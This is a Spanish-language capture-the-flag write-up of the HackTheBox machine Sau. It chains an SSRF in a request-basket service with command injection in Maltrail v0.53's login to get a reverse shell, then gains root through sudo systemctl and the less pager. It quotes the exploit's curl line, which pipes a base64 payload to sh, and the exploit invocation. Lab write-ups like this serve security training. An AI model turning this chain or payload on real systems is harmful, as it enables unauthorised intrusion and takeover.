Skip to content
Ghost In The Serp

Sau Machine

🔥 Explotación de Maltrail v0.53 - SSRF & RCE

Escaneo inicial con Nmap

Iniciamos con un escaneo Nmap y observamos que ciertos puertos están filtrados, en particular el ** puerto 80**.

⚠️ Este nivel de seguridad en el puerto 80 nos llama la atención, pero en este momento, no podemos acceder a él.

Al ampliar el escaneo, descubrimos otro puerto abierto, el 55555.

Accediendo a la aplicación en el puerto 55555

Probamos abrir este puerto en el navegador y nos encontramos con una aplicación interesante: un servicio de cestasque permite recibir peticiones dirigidas a una URL concreta.

Exploramos un poco la aplicación y nos llama la atenciónel botón de configuración, el cual ** permite reenviar peticiones a otra URL**.

¿Qué pasaría si configuramos una URL interna? ¿Podríamos acceder al servidor en el puerto 80a través de esta funcionalidad?

Configuración de la cesta

Creamos una cesta y la configuramos para redireccionar tráfico.

⚠️ Es importante marcar la opción “Proxy Response”, de lo contrario, no obtendremos la información completa.

Una vez configurada, visitamos la URL de la cesta y… ¡sorpresa!
Hemos accedido a la aplicación que estaba corriendo en el puerto 80.

Acabamos de encontrar una vulnerabilidad SSRF (Server-Side Request Forgery).

Explotación de Maltrail v0.53 (RCE)

Dado que la aplicación en el puerto 80 estaba filtrada, esto nos hace sospechar que podría ser vulnerable.

Tras una breve investigación, encontramos un exploit para Maltrail v0.53, el cual permite ejecución remota de comandos (RCE).

** detalles de la vulnerabilidad:**

  • La entrada del nombre de usuario****no sanitiza los datos.
  • Podemos ejecutar comandos simplemente añadiendo un ; detrás del nombre de usuario.

Exploit disponible en GitHub: Maltrail v0.53 Exploit

Revisando el código del exploit, vemos que envía un comando en Base64a través de la URL de Maltrail:

command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"

Lanzando el exploit

Ahora, configuramos el exploit para redirigir la petición a través de nuestra cesta:

Terminal window
python3 exploit.py <ip_maquina_atacante> <puerto_maquina_atacante> http://<ip_maquina_sau_hackthebox>:55555/cesta_creada

✅ **Recibimos una shell reversa con éxito.**🎯

Escalada de privilegios

Ejecutamos:

Terminal window
sudo -l

Vemos que el usuario puede ejecutar:

Terminal window
systemctl trail.service

Explotación de paginación

⚠️ Cuando ejecutamos el servicio, nos pide presionar “Return” para continuar Esto nos indica que el sistema está usando un método de paginación similar a less.

Explotación con GTFOBins Podemos aprovechar esta característica ** para conseguir un shell root** siguiendo las instrucciones de:

GTFOBins - Less Exploit

¡Máquina Pwned!

Hemos logrado:

  1. Bypassear un puerto filtradocon ** sSRF**.
  2. **Ejecutar código remoto (RCE)**en Maltrail v0.53.
  3. Escalar privilegiosexplotando systemctl y paginación en less.

Referencia en HackTheBox: HackTheBox Machine Achievement